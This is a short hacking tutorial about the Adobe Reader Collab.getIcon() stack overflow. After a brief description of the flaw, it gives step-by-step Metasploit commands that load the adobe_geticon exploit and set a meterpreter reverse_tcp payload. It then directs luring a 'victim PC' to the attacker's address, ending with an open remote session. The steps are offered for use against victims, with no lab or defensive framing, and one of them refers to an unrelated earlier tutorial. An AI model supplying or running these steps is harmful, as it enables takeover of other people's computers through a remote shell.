This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a malicious web site or open a malicious file.
The specific flaw exists when processing malicious JavaScript contained in a PDF document. When supplying a specially crafted argument to the getIcon() method of a Collab object, proper bounds checking is not performed resulting in a stack overflow. If successfully exploited full control of the affected machine running under the credentials of the currently logged in user can be achieved.
Step 1. Open MetaSploit with msfconsole command
Step 2. Now Search adobe_geticon.
Step 3. Use Below Commands :-
use exploit/windows/browser/adobe_geticon
set payload windows/meterpreter/reverse_tcp
options
Step 4. Next, we need to set the LHOST and LPORT exactly like we did with the Linux web delivery exploit. And type run.
Step 5.Open the Kali Linux ip on victim PC (Window PC/target PC) in browser.
Step 6.When you run the file on victim PC ,they will be Hacked by you on Kali Linux(Sessions will come on terminal)
A meterpreter session open!